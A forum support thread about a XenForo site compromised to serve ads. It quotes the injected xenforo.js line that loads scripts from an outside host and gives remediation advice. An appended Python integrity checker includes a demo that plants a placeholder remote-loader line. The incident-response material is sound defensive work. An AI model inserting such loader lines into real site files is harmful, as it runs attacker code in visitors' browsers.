Xenforo exploit?

Shipside

Member
My xenforo forum is compromised and is serving ads (I have no ads)

<html><body style="margin:0px;"><a href=" http://main.exoclick.com/click.php?...8NGFjNzI5ODg3NWY4YWEwYjkxZjM5OWFhZWEyZDI0OTM= " target="_blank" onclick="this.href = this.href + '&clickX=' + event.clientX + '&clickY=' + event.clientY;"><img width="300" height="250" src=" https://static.exoclick.com/6a97888...a/banners/270750/16318120957971100_1_xacd.gif " border="0"></a></body></html>

I did a file integrity check and got this result:

js/xenforo/xenforo.js File does not contain expected contents. It's the only file that has been changed.

I have uploaded it to see if you can figure out what kind of exploit is going on.
 


First things to do are
- Update the server with the latest security patches.
- Upload XF files again.
- Change all your passwords on the server.
- Check logs if you can find how this could happen. And keep an eye on it if anything suspicious happens.
 
The likelihood is that your server was compromised in some other way. Code has been added to xenforo.js:
Code:
jQueryLoad("http://assemblergames.com/l/js/dark/google-services.php?t=6&s=3&w=150&h=500&l=content", function(){});jQueryLoad("http://assemblergames.com/l/js/dark/google-services.php?t=1&s=2&w=70&h=500&l=content", function(){});
It does depend on server setup whether this file would normally be editable via PHP, though ideally it wouldn't be. If it's not, then someone almost certainly gained access another way.

If you look at the URL there, you'll find an unexpected file in that directory which then leads to another one. You need to remove them and look very closely for anything else that may have been added unexpectedly.

If you're on a shared server, it's very possible that a compromise on another site has caused the issue. The fact that they served ads leads me to believe this wasn't necessarily a targeted event. Log analysis may be the only way to get some idea of what happened.

We certainly aren't aware of any issues in XF that would allow arbitrary code execution or arbitrary file writes.
 
We are on a dedicated server. We are examining logs.

We have ascertained that the exploit was most likely via an add-on for xenforo. We are still checking the entire server.

Most likely a 3rd party add-on is exposing xenforo to attack, and whilst we do not want to say what add-on without definitive proof, the weakness so far would fall in line with that idea.
 
Would it be worth putting a file integrity check notice in the ACP home that checks regularly and notifies the admin when something is off so it doesn't need to be done manually only after you notice something is wrong?
 
I will have files to send to you. I would like for you to examine them as we have not been able to determine how he was able to get access to xenforo files but not the server itself.
 
Which files? If they are files belonging to an add on then that should be reported to the add on author in the first instance as per the link above.
 
Would it be worth putting a file integrity check notice in the ACP home that checks regularly and notifies the admin when something is off so it doesn't need to be done manually only after you notice something is wrong?
Yes, that's always a good thing. I already do that.
Chris made an add-on to do that. This sends an email, makes a notice in the ACP and logs the error if something is wrong. (y)
https://xenforo.com/community/resources/auto-file-health-check.1375/
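A minimal version of the baseline-and-compare check discussed in this thread, as an added example (not XenForo's own file health check and not the linked add-on): it hashes a clean install, then reports files whose hash changed, files that appeared unexpectedly, and files that went missing. The directory layout, file contents and placeholder URL in the demo are constructed.

```python
import hashlib
import os
import shutil
import tempfile


def sha256_file(path):
    """SHA-256 of a file, read in chunks so large assets don't load into memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root):
    """Map relative path (forward slashes) -> sha256 for every file under root."""
    manifest = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            manifest[rel] = sha256_file(full)
    return manifest


def check_integrity(root, baseline):
    """Compare the live tree against a saved baseline manifest."""
    current = build_manifest(root)
    return {
        "modified": sorted(p for p in baseline if p in current and current[p] != baseline[p]),
        "unexpected": sorted(p for p in current if p not in baseline),
        "missing": sorted(p for p in baseline if p not in current),
    }


def demo():
    """Constructed scenario mirroring the thread: a clean install, then a tampered
    xenforo.js plus a dropped script in an unexpected web-served directory."""
    root = tempfile.mkdtemp()
    try:
        js = os.path.join(root, "js", "xenforo", "xenforo.js")
        os.makedirs(os.path.dirname(js))
        with open(js, "w") as f:
            f.write("/* clean xenforo.js (constructed) */\n")
        baseline = build_manifest(root)  # saved at install/upgrade time
        with open(js, "a") as f:  # injected remote loader, URL is a placeholder
            f.write("jQueryLoad('http://PLACEHOLDER.example/google-services.php', function(){});\n")
        dropped = os.path.join(root, "l", "js", "dark", "google-services.php")
        os.makedirs(os.path.dirname(dropped))
        with open(dropped, "w") as f:
            f.write("<?php // constructed placeholder, not a real payload\n")
        return check_integrity(root, baseline)
    finally:
        shutil.rmtree(root)
```

Run `demo()` to see the report; in practice you would persist the baseline manifest off-box and run the comparison from cron, alerting on any non-empty list.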
 